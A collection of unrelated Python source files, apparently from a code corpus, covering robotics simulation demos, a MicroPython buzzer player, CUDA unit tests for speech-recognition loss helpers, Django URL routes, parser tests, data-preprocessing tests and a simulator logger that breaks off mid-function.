from robosuite.wrappers import DomainRandomizationWrapper, GymImageDomainRandomizationWrapper
from robosuite.wrappers.domain_randomization_wrapper import DEFAULT_DYNAMICS_ARGS, DEFAULT_LIGHTING_ARGS, DEFAULT_CAMERA_ARGS, DEFAULT_COLOR_ARGS
from IPython import embed;
# We'll use instance randomization so that entire geom groups are randomized together
macros.USING_INSTANCE_RANDOMIZATION = True
if __name__ == "__main__":
# Create dict to hold options that will be passed to env creation call
options = {}
# print welcome info
print("Welcome to robosuite v{}!".format(suite.__version__))
print(suite.__logo__)
# Choose environment and add it to options
options["env_name"] = 'Lift'
# If a multi-arm environment has been chosen, choose configuration and appropriate robot(s)
options["robots"] = 'Jaco'
# Choose controller
controller_name = "OSC_POSE"
# Load the desired controller
options["controller_configs"] = load_controller_config(default_controller=controller_name)
# Help message to user
print()
print("Press \"H\" to show the viewer control panel.")
# initialize the task
env = suite.make(
**options,
has_renderer=True,
has_offscreen_renderer=False,
ignore_done=True,
use_camera_obs=False,
camera_names="agentview",
render_camera="nearfrontview",
control_freq=20,
hard_reset=False, # TODO: Not setting this flag to False brings up a segfault on macos or glfw error on linux
)
leave_out_color_geoms = ['cube', 'sphere', 'gripper', 'robot']
use_color_geoms = []
for g in env.sim.model.geom_names:
include = True
for lo in leave_out_color_geoms:
if lo.lower() in g.lower():
include = False
if include:
use_color_geoms.append(g)
color_args = DEFAULT_COLOR_ARGS
color_args['geom_names'] = use_color_geoms
color_args['local_rgb_interpolation'] = .3
color_args['local_material_interpolation'] = .3
color_args['randomize_texture_images'] = True
dynamics_args = DEFAULT_DYNAMICS_ARGS
camera_args = DEFAULT_CAMERA_ARGS
lighting_args = DEFAULT_LIGHTING_ARGS
# Get action limits
low, high = env.action_spec
for re in range(20):
env = GymImageDomainRandomizationWrapper(env,
randomize_dynamics=True,
dynamics_randomization_args=dynamics_args,
randomize_camera=True,
camera_randomization_args=camera_args,
randomize_color=True,
color_randomization_args=color_args,
randomize_lighting=True,
lighting_randomization_args=lighting_args,
randomize_on_reset=False,
randomize_every_n_steps=0)
env.reset()
for e in range(5):
for i in range(40):
action = np.random.uniform(low, high)
obs, reward, done, _ = env.step(action)
env.render()
env.reset()
#env.modders[0].change_default_texture('table_visual', np.random.randint(len(env.modders[0].textures)))
| StarcoderdataPython |
4883933 | <gh_stars>10-100
#
# This particular test was coded for the GHI Electronics G30 Development
# Board: https://www.ghielectronics.com/catalog/product/555
#
import pyb
from rtttl import RTTTL
import songs
# G30DEV
buz_tim = pyb.Timer(3, freq=440)
buz_ch = buz_tim.channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.BUZZER, pulse_width=0)
# Y2 on pyboard
# buz_tim = pyb.Timer(8, freq=440)
# buz_ch = buz_tim.channel(2, pyb.Timer.PWM, pin=pyb.Pin('Y2'), pulse_width=0)
pwm = 50 # reduce this to reduce the volume
def play_tone(freq, msec):
print('freq = {:6.1f} msec = {:6.1f}'.format(freq, msec))
if freq > 0:
buz_tim.freq(freq)
buz_ch.pulse_width_percent(pwm)
pyb.delay(int(msec * 0.9))
buz_ch.pulse_width_percent(0)
pyb.delay(int(msec * 0.1))
def play(tune):
try:
for freq, msec in tune.notes():
play_tone(freq, msec)
except KeyboardInterrupt:
play_tone(0, 0)
def play_song(search):
play(RTTTL(songs.find(search)))
# play songs from songs.py
play_song('Entertainer')
# play songs directly
play(RTTTL('Monty Python:d=8,o=5,b=180:d#6,d6,4c6,b,4a#,a,4g#,g,f,g,g#,4g,f,2a#,p,a#,g,p,g,g,f#,g,d#6,p,a#,a#,p,g,g#,p,g#,g#,p,a#,2c6,p,g#,f,p,f,f,e,f,d6,p,c6,c6,p,g#,g,p,g,g,p,g#,2a#,p,a#,g,p,g,g,f#,g,g6,p,d#6,d#6,p,a#,a,p,f6,f6,p,f6,2f6,p,d#6,4d6,f6,f6,e6,f6,4c6,f6,f6,e6,f6,a#,p,a,a#,p,a,2a#'))
| StarcoderdataPython |
4983669 | # Métodos: Envelhercer, engordar, emagrecer, crescer. Obs: Por padrão, a cada ano que nossa pessoa envelhece,
# sendo a idade dela menor que 21 anos, ela deve crescer 0,5 cm.
class Pessoa:
def __init__(self, nome, idade, peso, altura):
self.nome = nome
self.idade = idade
self.peso = peso
self.altura = altura
def envelhecer(self, anos):
if self.idade < 21:
if (self.idade + anos) > 20:
crescer = (20 - self.idade) * 0.5
else:
crescer = anos * 0.5
self.altura += crescer
self.idade += anos
def engordar(self, kg):
self.peso += kg
def emagrecer(self, kg):
self.peso -= kg
def crescer(self, tamanho):
self.altura += tamanho
def mostrar(self):
print(f'Seja bem vindo {self.nome}, vamos analisar: ')
print(f'Sua idade é de {self.idade} anos.')
print(f'Seu peso é de {self.peso} kilos.')
print(f'Sua altura é de {self.altura}!')
cliente1 = Pessoa('Felipe', 14, 79.5, 176.4)
cliente1.mostrar()
cliente1.envelhecer(14)
cliente1.emagrecer(5.4)
cliente1.crescer(5)
cliente1.mostrar()
| StarcoderdataPython |
1888393 | <reponame>niklub/NeMo<filename>tests/collections/asr/numba/rnnt_loss/utils/test_rnnt_helper.py
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from numba import cuda
from nemo.collections.asr.parts.numba.rnnt_loss.utils import global_constants, rnnt_helper
class TestRNNTHelper:
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_log_sum_exp(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.log_sum_exp(x[x_pos], y[x_pos])
x = np.zeros([8]) # np.random.rand(8192)
y = np.ones([8]) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
assert (x_new.sum() - 10.506093500145782) <= 1e-5
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_log_sum_exp_neg_inf(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.log_sum_exp(x[x_pos], y[x_pos])
x = np.asarray([global_constants.FP32_NEG_INF] * 8)
y = np.ones([len(x)])
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
assert np.allclose(x_new, np.ones_like(x_new), atol=1e-5)
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_div_up(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.div_up(x[x_pos], y[x_pos])
x = np.full([8], fill_value=10) # np.random.rand(8192)
y = np.full([8], fill_value=2) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
for i in range(len(x_new)):
assert x_new[i] == ((10 + 2 - 1) // 2)
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_add(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.add(x[x_pos], y[x_pos])
x = np.full([8], fill_value=10) # np.random.rand(8192)
y = np.full([8], fill_value=2) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
for i in range(len(x_new)):
assert x_new[i] == 12
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_maximum(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.maximum(x[x_pos], y[x_pos])
x = np.full([8], fill_value=10) # np.random.rand(8192)
y = np.full([8], fill_value=2) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
for i in range(len(x_new)):
assert x_new[i] == 10
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_identity(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x):
x_pos = cuda.grid(1)
if x_pos < x.shape[0]:
x[x_pos] = rnnt_helper.identity(x[x_pos])
x = np.full([8], fill_value=10) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c
for i in range(len(x_new)):
assert x_new[i] == x[i]
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_negate(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x):
x_pos = cuda.grid(1)
if x_pos < x.shape[0]:
x[x_pos] = rnnt_helper.negate(x[x_pos])
x = np.full([8], fill_value=10) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c
for i in range(len(x_new)):
assert x_new[i] == -x[i]
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_exponential(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x):
x_pos = cuda.grid(1)
if x_pos < x.shape[0]:
x[x_pos] = rnnt_helper.exponential(x[x_pos])
x = np.random.rand(8)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c
y = np.exp(x)
for i in range(len(x_new)):
assert (x_new[i] - y[i]) < 1e-4
@pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
@pytest.mark.unit
def test_log_plus(self):
# wrapper kernel for device function that is tested
@cuda.jit
def _kernel(x, y):
x_pos = cuda.grid(1)
if x_pos < x.shape[0] and x_pos < y.shape[0]:
x[x_pos] = rnnt_helper.log_plus(x[x_pos], y[x_pos])
x = np.full([8], fill_value=10.0) # np.random.rand(8192)
y = np.full([8], fill_value=2.0) # np.random.rand(8192)
stream = cuda.stream()
x_c = cuda.to_device(x, stream=stream)
y_c = cuda.to_device(y, stream=stream)
# call kernel
threads_per_block = global_constants.threads_per_block()
blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
_kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)
# sync kernel
stream.synchronize()
x_new = x_c.copy_to_host(stream=stream)
del x_c, y_c
z = np.log1p(np.exp(-np.fabs(x - y))) + np.maximum(x, y)
for i in range(len(x_new)):
assert x_new[i] == z[i]
if __name__ == '__main__':
pytest.main([__file__])
| StarcoderdataPython |
9694242 | <reponame>CybercentreCanada/assemblyline-v4-p2compat
import logging
import os
from assemblyline_v4_p2compat.common.log import init_logging
from assemblyline_v4_p2compat.common import forge
def test_logger():
config = forge.get_config()
config.logging.log_to_console = False
config.logging.log_to_file = True
config.logging.log_directory = '/tmp'
init_logging("bob", config=config)
log = logging.getLogger("assemblyline.bob")
log.info("test")
assert os.path.exists('/tmp/bob.log')
assert os.path.exists('/tmp/bob.err')
| StarcoderdataPython |
6481496 | """Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.ops.sets import set_difference
from tensorflow.python.ops.sets import set_intersection
from tensorflow.python.ops.sets import set_size
from tensorflow.python.ops.sets import set_union | StarcoderdataPython |
4816641 | from django.urls import path
from core.projects.views.members import MemberApi, MembersApi
from core.projects.views.projects import ProjectsApi, ProjectApi
from core.projects.views.roles import RolesApi, RoleApi
from core.projects.views.settings import ProjectSettingsApi
from core.projects.views.tasks import ProjectTasksApi, ProjectTaskApi
urlpatterns = [
path('projects/', ProjectsApi.as_view(), name='projects'),
path('projects/<int:project_id>/', ProjectApi.as_view(), name='project'),
path('projects/<int:project_id>/roles/', RolesApi.as_view(), name='roles'),
path('projects/<int:project_id>/roles/<int:role_id>/', RoleApi.as_view(), name='role'),
path('projects/<int:project_id>/members/', MembersApi.as_view(), name='members'),
path('projects/<int:project_id>/members/<int:member_id>/', MemberApi.as_view(), name='member'),
path('projects/<int:project_id>/settings/', ProjectSettingsApi.as_view(), name='settings'),
path('projects/<int:project_id>/tasks/', ProjectTasksApi.as_view(), name='tasks'),
path('projects/<int:project_id>/tasks/<int:task_id>/', ProjectTaskApi.as_view(), name='task')
]
| StarcoderdataPython |
3246433 | <reponame>radomd92/botjagwar<filename>test/unit_tests/test_parsers/test_adjective_form_parsers.py<gh_stars>1-10
from unittest import TestCase
from api.parsers.functions import parse_el_form_of
from api.parsers.functions import parse_inflection_of
from api.parsers.functions import parse_lv_inflection_of
from api.parsers.functions import parse_one_parameter_template
from api.parsers.functions.adjective_forms import parse_adjective_form
from api.parsers.inflection_template import AdjectiveForm
class TestAdjectiveFormParsers(TestCase):
def test_parse_adjective_form(self):
template_expression = '{{es-adj form of|minúsculo|f|sg}}'
output = parse_adjective_form(template_expression)
self.assertIsInstance(output, AdjectiveForm)
self.assertEqual(output.number, 'sg')
self.assertEqual(output.gender, 'f')
self.assertEqual(output.lemma, 'minúsculo')
def test_parse_lv_inflection_of(self):
template_expression = '{{lv-inflection of|bagātīgs|dat|p|f||adj}}'
output = parse_lv_inflection_of(AdjectiveForm)(template_expression)
self.assertIsInstance(output, AdjectiveForm)
self.assertEqual(output.number, 'p')
self.assertEqual(output.case, 'dat')
self.assertEqual(output.lemma, 'bagātīgs')
def test_parse_inflection_of_adjective_form(self):
template_expression = '{{inflection of|abdominālis||voc|f|p|lang=la}}'
func = parse_inflection_of(AdjectiveForm)
output = func(template_expression)
self.assertIsInstance(output, AdjectiveForm)
self.assertEqual(output.lemma, 'abdominālis')
self.assertEqual(output.number, 'p')
self.assertEqual(output.gender, 'f')
self.assertEqual(output.case, 'voc')
def test_parse_one_parameter_template(self):
template_expression = '{{feminine singular of|comparatif|lang=fr}}'
func = parse_one_parameter_template(
AdjectiveForm,
'feminine singular of',
number='s',
definiteness='definite')
output = func(template_expression)
self.assertEqual(output.number, 's')
self.assertEqual(output.definite, 'definite')
self.assertEqual(output.lemma, 'comparatif')
def test_parse_el_form_of_adjective(self):
template_expression = '{{el-form-of-nounadj|αβοκέτα|c=gen|n=s}}'
output = parse_el_form_of(AdjectiveForm)(template_expression)
self.assertIsInstance(output, AdjectiveForm)
self.assertEqual(output.number, 's')
self.assertEqual(output.case, 'gen')
self.assertEqual(output.lemma, 'αβοκέτα')
| StarcoderdataPython |
9725968 | import numpy as np
from fedot.api.main import Fedot
from fedot.core.data.data import InputData
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.data.supplementary_data import SupplementaryData
from fedot.core.repository.dataset_types import DataTypesEnum
from fedot.core.repository.tasks import Task, TaskTypesEnum
from fedot.preprocessing.data_types import NAME_CLASS_STR
def data_with_only_categorical_features():
""" Generate tabular data with only categorical features. All of them are binary. """
supp_data = SupplementaryData(column_types={'features': [NAME_CLASS_STR] * 3})
task = Task(TaskTypesEnum.regression)
features = np.array([['a', '0', '1'],
['b', '1', '0'],
['c', '1', '0']], dtype=object)
input_data = InputData(idx=[0, 1, 2], features=features,
target=np.array([0, 1, 2]),
task=task, data_type=DataTypesEnum.table,
supplementary_data=supp_data)
return input_data
def data_with_too_much_nans():
""" Generate tabular data with too much nan's in numpy array (inf values also must be signed as nan).
Columns with ids 1 and 2 have nans more than 90% in their structure.
"""
task = Task(TaskTypesEnum.regression)
features = np.array([[1, np.inf, np.nan],
[np.nan, np.inf, np.nan],
[3, np.inf, np.nan],
[7, np.inf, np.nan],
[8, np.nan, np.nan],
[np.nan, np.nan, 23],
[9, np.inf, np.nan],
[9, np.inf, np.nan],
[9, np.inf, np.nan],
[9, '1', np.inf],
[8, np.nan, np.inf]], dtype=object)
target = np.array([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9], [10]])
train_input = InputData(idx=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], features=features,
target=target, task=task, data_type=DataTypesEnum.table,
supplementary_data=SupplementaryData(was_preprocessed=False))
return train_input
def data_with_spaces_and_nans_in_features():
"""
Generate InputData with categorical features with leading and
trailing spaces. Dataset contains np.nan also.
"""
task = Task(TaskTypesEnum.regression)
features = np.array([['1 ', '1 '],
[np.nan, ' 0'],
[' 1 ', np.nan],
['1 ', '0 '],
['0 ', ' 1'],
['1 ', ' 0']], dtype=object)
target = np.array([[0], [1], [2], [3], [4], [5]])
train_input = InputData(idx=[0, 1, 2, 3, 4, 5], features=features,
target=target, task=task, data_type=DataTypesEnum.table,
supplementary_data=SupplementaryData(was_preprocessed=False))
return train_input
def data_with_nans_in_target_column():
""" Generate InputData with np.nan values in target column """
task = Task(TaskTypesEnum.regression)
features = np.array([[1, 2],
[2, 2],
[0, 3],
[2, 3],
[3, 4],
[1, 3]])
target = np.array([[0], [1], [np.nan], [np.nan], [4], [5]])
train_input = InputData(idx=[0, 1, 2, 3, 4, 5], features=features,
target=target, task=task, data_type=DataTypesEnum.table,
supplementary_data=SupplementaryData(was_preprocessed=False))
return train_input
def data_with_nans_in_multi_target():
"""
Generate InputData with np.nan values in target columns.
So the multi-output regression task is solved.
"""
task = Task(TaskTypesEnum.regression)
features = np.array([[1, 2],
[2, 2],
[0, 3],
[2, 3],
[3, 4],
[1, 3]])
target = np.array([[0, 2], [1, 3], [np.nan, np.nan], [3, np.nan], [4, 4], [5, 6]])
train_input = InputData(idx=[0, 1, 2, 3, 4, 5], features=features,
target=target, task=task, data_type=DataTypesEnum.table,
supplementary_data=SupplementaryData(was_preprocessed=False))
return train_input
def data_with_categorical_target(with_nan: bool = False):
"""
Generate dataset for classification task where target column is defined as
string categories (e.g. 'red', 'green'). Dataset is generated so that when
split into training and test in the test sample in the target will always
be a new category.
:param with_nan: is there a need to generate target column with np.nan
"""
task = Task(TaskTypesEnum.classification)
features = np.array([[0, 0],
[0, 1],
[8, 8],
[8, 9]])
if with_nan:
target = np.array(['blue', np.nan, np.nan, 'di'], dtype=object)
else:
target = np.array(['blue', 'da', 'ba', 'di'], dtype=str)
train_input = InputData(idx=[0, 1, 2, 3], features=features,
target=target, task=task, data_type=DataTypesEnum.table,
supplementary_data=SupplementaryData(was_preprocessed=False))
return train_input
def test_correct_api_dataset_preprocessing():
""" Check if dataset preprocessing was performed correctly when API launch using. """
funcs = [data_with_only_categorical_features, data_with_too_much_nans,
data_with_spaces_and_nans_in_features, data_with_nans_in_target_column,
data_with_nans_in_multi_target]
# Check for all datasets
for data_generator in funcs:
input_data = data_generator()
fedot_model = Fedot(problem='regression')
pipeline = fedot_model.fit(input_data, predefined_model='auto')
assert pipeline is not None
def test_categorical_target_processed_correctly():
""" Check if categorical target for classification task first converted
into integer values and then perform inverse operation. API tested in this
test.
"""
classification_data = data_with_categorical_target()
train_data, test_data = train_test_data_setup(classification_data)
fedot_model = Fedot(problem='classification')
fedot_model.fit(train_data, predefined_model='auto')
predicted = fedot_model.predict(test_data)
# Predicted label must be close to 'di' label (so, right prediction is 'ba')
assert predicted[0] == 'ba'
| StarcoderdataPython |
11262061 | import json
from json import JSONDecodeError
from os.path import exists
from typing import Optional, Tuple, List, Dict
import torch
from omegaconf import DictConfig
from torch.utils.data import Dataset
from utils.common import LABEL, AST, SOURCE, CHILDREN, TOKEN, PAD, NODE, SEPARATOR, UNK, SOS, EOS, SPLIT_FIELDS
from utils.vocabulary import Vocabulary
class JsonlSourceASTDataset(Dataset):
_log_file = "bad_samples.log"
def __init__(self, data_file: str, vocabulary: Vocabulary, config: DictConfig):
if not exists(data_file):
raise ValueError(f"Can't find file with data: {data_file}")
self._data_file = data_file
self._vocab = vocabulary
self._config = config
self._token_unk = vocabulary.token_to_id[UNK]
self._node_unk = vocabulary.node_to_id[UNK]
self._label_unk = vocabulary.label_to_id[UNK]
self._line_offsets = []
cumulative_offset = 0
with open(self._data_file, 'r') as file:
for line in file:
self._line_offsets.append(cumulative_offset)
cumulative_offset += len(line.encode(file.encoding))
self._n_samples = len(self._line_offsets)
def __len__(self):
return self._n_samples
def _read_line(self, index: int) -> str:
with open(self._data_file, 'r') as data_file:
data_file.seek(self._line_offsets[index])
line = data_file.readline().strip()
return line
def _get_graph_features(self, ast):
max_token_parts = self._config.max_node_token_parts
max_nodes = self._config.max_ast_nodes
nodes = torch.full((max_nodes,), self._vocab.node_to_id[PAD])
node_tokens = torch.full((max_nodes, max_token_parts), self._vocab.token_to_id[PAD])
adj_matrix = torch.zeros((max_nodes, max_nodes), dtype=torch.int8)
for idx, node in enumerate(ast):
if idx == max_nodes:
break
nodes[idx] = self._vocab.node_to_id.get(node[NODE], self._node_unk)
sub_values = node[TOKEN].split(SEPARATOR)[: max_token_parts]
sub_values_ids = [self._vocab.token_to_id.get(sv, self._token_unk) for sv in sub_values]
node_tokens[idx, : len(sub_values_ids)] = torch.tensor(sub_values_ids)
for child in node[CHILDREN]:
if child < max_nodes:
adj_matrix[idx, child] = 1
adj_matrix[child, idx] = 1
return (nodes, node_tokens), adj_matrix
def _get_source_code_features(self, code):
max_tokens = self._config.max_source_parts
sc_tokens = torch.full((max_tokens,), self._vocab.token_to_id[PAD])
sub_tokens = code.split(SEPARATOR)[:max_tokens]
sc_tokens[:len(sub_tokens)] = torch.tensor(
[self._vocab.token_to_id.get(st, self._token_unk) for st in sub_tokens]
)
return sc_tokens
def _get_label(self, str_label: str) -> torch.Tensor:
label = torch.full((self._config.max_label_parts + 1, 1), self._vocab.label_to_id[PAD])
label[0, 0] = self._vocab.label_to_id[SOS]
sublabels = str_label.split(SEPARATOR)[: self._config.max_label_parts]
label[1 : len(sublabels) + 1, 0] = torch.tensor(
[self._vocab.label_to_id.get(sl, self._label_unk) for sl in sublabels]
)
if len(sublabels) < self._config.max_label_parts:
label[len(sublabels) + 1, 0] = self._vocab.label_to_id[EOS]
return label
def _read_sample(self, index: int) -> Optional[Dict]:
raw_sample = self._read_line(index)
try:
sample = json.loads(raw_sample)
except JSONDecodeError as e:
with open(self._log_file, "a") as log_file:
log_file.write(raw_sample + "\n")
return None
if sample[LABEL] == "":
with open(self._log_file, "a") as log_file:
log_file.write(raw_sample + "\n")
return None
return sample
def __getitem__(self, index: int) -> Optional[Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]]:
sample = self._read_sample(index)
if sample is None:
return None
label = self._get_label(sample[LABEL])
(nodes, node_tokens), adj_matrix = self._get_graph_features(sample[AST])
sc_tokens = self._get_source_code_features(sample[SOURCE])
return sc_tokens, nodes, node_tokens, adj_matrix, label | StarcoderdataPython |
8179149 | import click
import serial
@click.command()
@click.argument('baud_rate', type=int)
def serial_loop(baud_rate):
with serial.Serial('/dev/ttyACM0', baud_rate, timeout=None) as ser:
while True:
val = input("> ")
ser.write(val.encode('ascii'))
ser.flush()
if __name__ == "__main__":
serial_loop()
| StarcoderdataPython |
375621 | <filename>tests/factory/data_factory.py
from requests import Response
from .helper import json_helper
def mock_success_spotify_token_response():
response = Response()
response.status_code = 200
response._content = json_helper.get_json_mock('spotify_token_response_success.json')
return response
def mock_failure_spotify_token_response():
response = Response()
response.status_code = 500
response._content = None
return response
def mock_success_spotify_search_music_response():
response = Response()
response.status_code = 200
response._content = json_helper.get_json_mock('spotify_search_response_success.json')
return response
def mock_success_spotify_track_detail_response():
response = Response()
response.status_code = 200
response._content = json_helper.get_json_mock('spotify_track_detail_response_success.json')
return response
| StarcoderdataPython |
9748077 | <gh_stars>1-10
import sys
import os
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from net.dstg import *
if __name__ == '__main__':
graph_args = {
'layout':'openpose',
'strategy':'spatial'
}
model = DSTG(graph_args,depth=16)
for name,para in model.named_parameters():
print(name)
# print(model) | StarcoderdataPython |
8128613 | #!/usr/bin/env python
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
SITEURL = "https://musard.com"
RELATIVE_URLS = False
FEED_DOMAIN = SITEURL
FEED_ALL_ATOM = "feeds/all.atom.xml"
DELETE_OUTPUT_DIRECTORY = True
| StarcoderdataPython |
12827658 | <filename>src/siamese_network_bw/graph.py
import re
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib.font_manager import FontProperties
import constants
def plot_results(training_details, validation_details, note=None):
"""
Generates a combined training/validation graph.
"""
print "\tPlotting results..."
fig, ax1 = plt.subplots()
ax1.plot(training_details["iters"], training_details["loss"], "b-")
ax1.set_xlabel("Iterations")
ax1.set_ylabel("Training Loss", color="b")
for tl in ax1.get_yticklabels():
tl.set_color("b")
ax2 = ax1.twinx()
ax2.plot(validation_details["iters"], validation_details["loss"], "r-")
ax2.set_ylabel("Validation Loss", color="r")
for tl in ax2.get_yticklabels():
tl.set_color("r")
legend_font = FontProperties()
legend_font.set_size("small")
blue_line = mpatches.Patch(color="blue", label="Training Loss")
red_line = mpatches.Patch(color="red", label="Validation Loss")
plt.legend(handles=[blue_line, red_line], prop=legend_font, loc="lower right")
plt.suptitle("Iterations vs. Training/Validation Loss", fontsize=14)
plt.title(get_hyperparameter_details(note), style="italic", fontsize=12)
plt.savefig(constants.OUTPUT_GRAPH_PATH)
print("\t\tGraph saved to %s" % constants.OUTPUT_GRAPH_PATH)
def get_hyperparameter_details(note=None):
"""
Parse out some of the values we need from the Caffe solver prototext file.
"""
solver = open(constants.SOLVER_FILE, "r")
details = solver.read()
lr = re.search("^base_lr:\s*([0-9.]+)$", details, re.MULTILINE).group(1)
max_iter = re.search("^max_iter:\s*([0-9.]+)$", details, re.MULTILINE).group(1)
results = "(lr: %s; max_iter: %s; %s" % (lr, max_iter, constants.ARCHITECTURE)
# Add any extra details into the graph if someone specified that on the command line.
if note:
results += "; %s" % note
results += ")"
return results
| StarcoderdataPython |
9666962 | #!/usr/bin/env python
"""
@package ion.agents.platform.rsn.simulator.logger
@file ion/agents/platform/rsn/simulator/logger.py
@author <NAME>
@brief Logger configuration for the OMS simulator.
"""
__author__ = '<NAME>'
class Logger(object):
log = None
@classmethod
def set_logger(cls, log):
"""
Allows to specify the logger from outside (in particular to allow the
use of pyon.public.log).
"""
cls.log = log
@classmethod
def get_logger(cls):
"""
Gets the logger for the simulator. This is configured here unless a
logger has been specified via set_logger.
"""
if not cls.log:
import logging
import os
log = logging.getLogger('oms_simulator')
level_expr = "logging.%s" % os.getenv("oms_simulator_loglevel", "WARN")
print "oms_simulator: setting log level to: %s" % level_expr
try:
level = eval(level_expr)
except Exception as ex:
print "oms_simulator: Error evaluating %r: %s" % (level_expr, str(ex))
print "oms_simulator: setting log level to: logging.DEBUG"
level = logging.DEBUG
log.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(level)
format = '%(asctime)s %(levelname)-8s %(threadName)s %(name) -15s:%(lineno)d %(funcName)s %(message)s'
